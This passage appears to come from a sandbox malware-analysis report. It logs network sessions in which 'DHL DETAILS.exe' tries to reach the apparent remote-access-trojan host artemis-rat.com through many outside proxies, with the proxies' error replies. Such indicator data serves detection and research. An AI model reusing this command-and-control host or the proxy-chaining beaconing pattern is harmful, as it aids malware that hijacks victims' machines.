Mar 9, 2024 13:14:17.093494892 CET	1286	IN	Data Raw: 35 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 73 70 61 6e Data Ascii: 500</span> <span class="status-reason">Internal Server Error</span> </section> <section class="contact-info"> Please forward this error screen to artemis-rat.com's <a href="mailto:root@h
Mar 9, 2024 13:14:17.093631983 CET	352	IN	Data Raw: 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 35 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 69 74 6c 65 3d Data Ascii: edium=cplogo&utm_content=logolink&utm_campaign=500referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">Copyri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
230	192.168.2.5	50571	49.228.131.169	5000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.163161039 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
231	192.168.2.5	51035	202.159.19.213	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.165250063 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
232	192.168.2.5	50624	43.131.242.162	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.166711092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
233	192.168.2.5	51040	202.159.19.213	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.166717052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
234	192.168.2.5	50588	88.210.20.144	20000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.167819023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.638554096 CET	202	IN	HTTP/1.0 404 Not Found Content-Length: 717 Content-Type: text/html Date: Sun, 28 Jan 2024 21:35:17 GMT Expires: Sun, 28 Jan 2024 21:35:17 GMT Server: Mikrotik HttpProxy Proxy-Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
235	192.168.2.5	51042	202.159.19.213	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.167905092 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
236	192.168.2.5	51045	202.159.19.213	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.168755054 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
237	192.168.2.5	50627	20.24.43.214	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.174413919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.501046896 CET	319	IN	HTTP/1.1 403 Forbidden Server: squid Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html;charset=utf-8 Content-Length: 17 X-Squid-Error: ERR_ACCESS_DENIED 0 X-Cache: MISS from cdn-fintech.info X-Cache-Lookup: NONE from cdn-fintech.info:8123 Connection: keep-alive Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
238	192.168.2.5	51064	202.159.35.189	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.176985979 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
239	192.168.2.5	51065	202.159.35.189	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.178323030 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
240	192.168.2.5	51068	202.159.35.189	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.179127932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
241	192.168.2.5	50712	54.178.159.199	18080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.179990053 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.443542957 CET	503	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sat, 09 Mar 2024 12:14:12 GMT Connection: close Content-Length: 324 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
242	192.168.2.5	51072	202.159.35.189	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.180202961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
243	192.168.2.5	49989	117.160.250.163	82	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.183456898 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.833101988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.841980934 CET	221	IN	HTTP/1.1 403 Access Denied Date: Sat, 09 Mar 2024 12:14:15 GMT Connection: close Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 43 Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e Data Ascii: You are not allowed to access the document.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
244	192.168.2.5	49994	36.134.91.82	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.184564114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
245	192.168.2.5	50844	104.20.225.218	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.187690973 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.342051983 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
246	192.168.2.5	50855	185.162.229.215	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.187894106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.341947079 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
247	192.168.2.5	50679	93.190.142.57	31243	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.192605972 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.486598969 CET	226	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Length: 101 Content-Type: text/plain; charset=utf-8 Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
248	192.168.2.5	50807	73.151.59.35	20816	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.193329096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
249	192.168.2.5	50022	184.170.248.5	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.200985909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
250	192.168.2.5	50024	184.170.245.148	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.202518940 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
251	192.168.2.5	50688	128.140.26.12	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.208786011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.518464088 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.25.2 Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
252	192.168.2.5	50728	134.209.29.120	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.214379072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.536053896 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
253	192.168.2.5	50869	172.67.105.234	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.216439962 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.370934963 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
254	192.168.2.5	50672	193.239.58.92	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.223215103 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
255	192.168.2.5	50887	172.64.80.55	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.226052999 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.380620956 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
256	192.168.2.5	50891	104.20.67.113	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.227442980 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.381745100 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
257	192.168.2.5	50876	162.159.246.135	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.228799105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.390300989 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
258	192.168.2.5	50902	104.19.79.238	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.231528997 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
